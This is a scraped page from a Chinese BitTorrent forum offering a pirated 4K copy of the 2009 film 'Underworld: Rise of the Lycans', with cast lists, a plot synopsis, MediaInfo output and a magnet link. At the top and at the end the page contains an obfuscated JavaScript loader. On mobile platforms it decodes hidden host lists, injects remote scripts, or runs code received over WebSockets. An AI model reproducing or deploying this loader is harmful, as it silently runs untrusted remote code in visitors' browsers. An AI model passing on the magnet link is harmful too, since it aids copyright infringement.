黑夜传说3:狼族崛起[中文字幕].Underworld.Rise.of.the.Lycans.2009.2160p.HDR.UHD.BluRay.TrueHD.7.1.Atmos.x265-10bit 13.15GB

版主小s 20天前 176

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 黑夜传说3:狼族崛起 / 妖夜寻狼前传之狼神诞生(港) / 决战异世界前传:鬼哭狼嚎(台) / 妖夜寻狼前传之狼神诞生 / 黑夜传说前传:狼族再起

◎片 名 Underworld: Rise of the Lycans

◎年 代 2009

◎产 地 美国 / 新西兰

◎类 别 动作 / 惊悚 / 奇幻

◎语 言 英语

◎上映日期 2009-01-23(美国)

◎IMDb链接 https://www.imdb.com/title/tt0834001/

◎豆瓣评分 6.8/10 (45372人评价)

◎豆瓣链接 https://movie.douban.com/subject/2132941/

◎片 长 92 分钟

◎导 演 帕特里克·塔特普洛斯 Patrick Tatopoulos (id:1298949)

◎编 剧 丹尼·麦克布莱德 Danny McBride (id:1013797)

伦·怀斯曼 Len Wiseman (id:1031983)

凯文·格雷维奥斯 Kevin Grevioux (id:1336254)

德克·布莱克曼 Dirk Blackman (id:1327581)

霍华德·麦凯恩 Howard McCain (id:1327580)

◎演 员 麦克·辛 Michael Sheen (id:1004566)

比尔·奈伊 Bill Nighy (id:1041002)

罗娜·迈特拉 Rhona Mitra (id:1022569)

斯蒂文·麦金托什 Steven Mackintosh (id:1048187)

凯文·格雷维奥斯 Kevin Grevioux (id:1336254)

伊丽莎白·霍桑 Elizabeth Hawthorne (id:1286259)

蒂莫西拉比 Timothy Raby (id:1141561)

贾里德·特纳 Jared Turner (id:1187835)

Kurt Carley Kurt Carley (id:1070768)

坦尼亚·诺兰 Tania Nolan (id:1240528)

克雷格·帕克 Craig Parker (id:1040564)

山恩·布罗利 Shane Brolly (id:1032192)

马克·米钦森 Mark Mitchinson (id:1362758)

汤姆·罗森伯格 Tom Rosenberg (id:1296083)

加里·卢切西 Gary Lucchesi (id:1290411)

理查德·S·莱特 Richard S. Wright (id:1023608)

伦·怀斯曼 Len Wiseman (id:1031983)

Skip Williamson Skip Williamson (id:1305268)

保罗·海斯林格 Paul Haslinger (id:1037358)

Eric Potter Eric Potter (id:1003635)

丹·汉纳 Dan Hennah (id:1286442)

Gary Mackay Gary Mackay (id:1290640)

简·霍兰德 Jane Holland (id:1010152)

Cristina Patterson Ceret Cristina Patterson Ceret (id:1133266)

Deb Watson Deb Watson (id:1308168)

金波·兰道 Kimble Rendall (id:1321989)

席夫·多拉基亚 Shiv Dholakia (id:1231127)

Christopher Puchta (id:1228381)

Nicolas Bonnell (id:1224316)

Steve Griffith Steve Griffith (id:1214470)

Georgia Scheele Georgia Scheele (id:1203119)

Nicolas Rigaud Nicolas Rigaud (id:1186554)

Adam Smith Adam Smith (id:1185749)

Andreas Jablonka (id:1236148)

Rasshi Ganeriwal (id:1243759)

Daniel Gaudreau (id:1253211)

David Nathanael Beck (id:1261236)

凯尔·维尔 Kyle Ware (id:1265159)

Anthony Grant (id:1269938)

Thomas Duval Thomas Duval (id:1276481)

汤米·陈 Tommy Tran (id:1299471)

Mark Fordham Mark Fordham (id:1305949)

Charlie McClellan Charlie McClellan (id:1291480)

Chris Zammit Chris Zammit (id:1179305)

Bojan Zoric Bojan Zoric (id:1172071)

Annabelle Troukens Annabelle Troukens (id:1158419)

洛恩·莫尔纳 Lon Molnar (id:1051865)

格雷格·阿瑟尔斯 Greg Astles (id:1059196)

John Cassella John Cassella (id:1072146)

Serge? Lourié Serge? Lourié (id:1123598)

托尼·马加莱塔 Tony Magaletta (id:1124827)

Mike L. Murphy Mike L. Murphy (id:1129105)

Marc Joubert Marc Joubert (id:1021982)

◎标 签 吸血鬼 / 魔幻 / 美国 / 狼人 / 动作 / 黑夜传说 / 美国电影 / 2009

◎简 介

遥远的黑暗世纪,柯文诺斯的子孙一分为二。血族在维多(比利·奈伊 Bill Nighy 饰)的领导下独行天下,强大的吸血兵团压制极具传染性且无法进化成人的残暴狼族。直到某天,一个神奇的生命诞生,改变了这两个家族的命运。一只母狼诞下有着人类外表的狼人路西安(麦克·辛 Michael Sheen 饰),维多窥见狼人身体内的强大实力,于是对其大量繁殖,并将狼人纳为服务血族的奴隶。奴隶的苦难永无终结,而在这一过程中路西安还冒天下之大不韪与维多的女儿桑雅(罗娜·迈特拉 Rhona Mitra 饰)偷偷相恋。

渴望自由的路西安最终设法解开维多对自己的禁锢,狼人与血族持续数百年的战争亦由此拉开序幕……

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 278296760214707118866298501413706795990 (0xD15E01A2EDC47F07A48217F0B9FA0BD6)

  4. Complete name : Underworld.Rise.of.the.Lyc[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 13.1 GiB

  8. Duration : 1 h 32 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 20.3 Mb/s

  11. Movie name : Underworld Rise of the Lycans 2009 2160p HDR UHD BluRay TrueHD 7.1 Atmos [email protected]

  12. Encoded date : UTC 2021-11-10 13:55:05

  13. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  14. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  15. Video

  16. ID : 1

  17. Format : HEVC

  18. Format/Info : High Efficiency Video Coding

  19. Format profile : Main [email protected]@High

  20. HDR format : SMPTE ST 2086, HDR10 compatible

  21. Codec ID : V_MPEGH/ISO/HEVC

  22. Duration : 1 h 32 min

  23. Bit rate : 15.6 Mb/s

  24. Width : 3 840 pixels

  25. Height : 1 608 pixels

  26. Display aspect ratio : 2.40:1

  27. Frame rate mode : Constant

  28. Frame rate : 23.976 (24000/1001/53354) FPS

  29. Color space : YUV

  30. Chroma subsampling : 4:2:0

  31. Bit depth : 10 bits

  32. Bits/(Pixel*Frame) : 0.105

  33. Stream size : 10.1 GiB (77%)

  34. Title : @HDSky

  35. Writing library : x265 - H.265/HEVC codec

  36. Default : Yes

  37. Forced : No

  38. Color range : Limited

  39. Color primaries : BT.2020

  40. Transfer characteristics : PQ

  41. Matrix coefficients : BT.2020 non-constant

  42. Mastering display color primaries : Display P3

  43. Mastering display luminance : min: 0.0020 cd/m2, max: 1000 cd/m2

  44. Maximum Content Light Level : 739 cd/m2

  45. Maximum Frame-Average Light Level : 331 cd/m2


  46. Audio

  47. ID : 2

  48. Format : MLP FBA 16-ch

  49. Format/Info : Meridian Lossless Packing FBA with 16-channel presentation

  50. Commercial name : Dolby TrueHD with Dolby Atmos

  51. Codec ID : A_TRUEHD

  52. Duration : 1 h 32 min

  53. Bit rate mode : Variable

  54. Bit rate : 4 640 kb/s

  55. Maximum bit rate : 7 854 kb/s

  56. Channel(s) : 8 channels

  57. Channel layout : L R C LFE Ls Rs Lb Rb

  58. Sampling rate : 48.0 kHz

  59. Frame rate : 1 200.000 FPS (40 SPF)

  60. Compression mode : Lossless

  61. Stream size : 3.00 GiB (23%)

  62. Title : English

  63. Language : English

  64. Default : Yes

  65. Forced : No

  66. Number of dynamic objects : 11

  67. Bed channel count : 1 channel

  68. Bed channel configuration : LFE


  69. Text #1

  70. ID : 3

  71. Format : PGS

  72. Muxing mode : zlib

  73. Codec ID : S_HDMV/PGS

  74. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  75. Duration : 1 h 31 min

  76. Bit rate : 20.3 kb/s

  77. Count of elements : 1566

  78. Stream size : 13.3 MiB (0%)

  79. Title : ENG

  80. Language : English

  81. Default : Yes

  82. Forced : No


  83. Text #2

  84. ID : 4

  85. Format : PGS

  86. Muxing mode : zlib

  87. Codec ID : S_HDMV/PGS

  88. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  89. Duration : 1 h 22 min

  90. Bit rate : 16.8 kb/s

  91. Count of elements : 1308

  92. Stream size : 9.88 MiB (0%)

  93. Title : CHS

  94. Language : Chinese

  95. Default : No

  96. Forced : No


  97. Text #3

  98. ID : 5

  99. Format : PGS

  100. Muxing mode : zlib

  101. Codec ID : S_HDMV/PGS

  102. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  103. Duration : 1 h 22 min

  104. Bit rate : 16.4 kb/s

  105. Count of elements : 1308

  106. Stream size : 9.64 MiB (0%)

  107. Title : CHT

  108. Language : Chinese

  109. Default : No

  110. Forced : No


  111. Text #4

  112. ID : 6

  113. Format : PGS

  114. Muxing mode : zlib

  115. Codec ID : S_HDMV/PGS

  116. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  117. Duration : 1 h 22 min

  118. Bit rate : 32.5 kb/s

  119. Count of elements : 1292

  120. Stream size : 19.2 MiB (0%)

  121. Title : CHS&ENG

  122. Language : Chinese

  123. Default : No

  124. Forced : No


  125. Text #5

  126. ID : 7

  127. Format : PGS

  128. Muxing mode : zlib

  129. Codec ID : S_HDMV/PGS

  130. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  131. Duration : 1 h 22 min

  132. Bit rate : 32.9 kb/s

  133. Count of elements : 1292

  134. Stream size : 19.4 MiB (0%)

  135. Title : CHT&ENG

  136. Language : Chinese

  137. Default : No

  138. Forced : No


  139. Menu

  140. 00:00:00.000 : en:Chapter 01

  141. 00:06:20.880 : en:Chapter 02

  142. 00:11:43.786 : en:Chapter 03

  143. 00:16:45.630 : en:Chapter 04

  144. 00:24:34.056 : en:Chapter 05

  145. 00:30:29.494 : en:Chapter 06

  146. 00:36:34.150 : en:Chapter 07

  147. 00:40:18.416 : en:Chapter 08

  148. 00:46:29.870 : en:Chapter 09

  149. 00:50:55.594 : en:Chapter 10

  150. 00:55:09.223 : en:Chapter 11

  151. 01:00:40.303 : en:Chapter 12

  152. 01:07:14.280 : en:Chapter 13

  153. 01:13:30.323 : en:Chapter 14

  154. 01:16:39.845 : en:Chapter 15

  155. 01:22:34.158 : en:Chapter 16




复制代码


TAGS 动作 奇幻 惊悚

磁力链:
  • magnet:?xt=urn:btih:1686CE545F57BB93C1FD275B8FA064974A882080

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};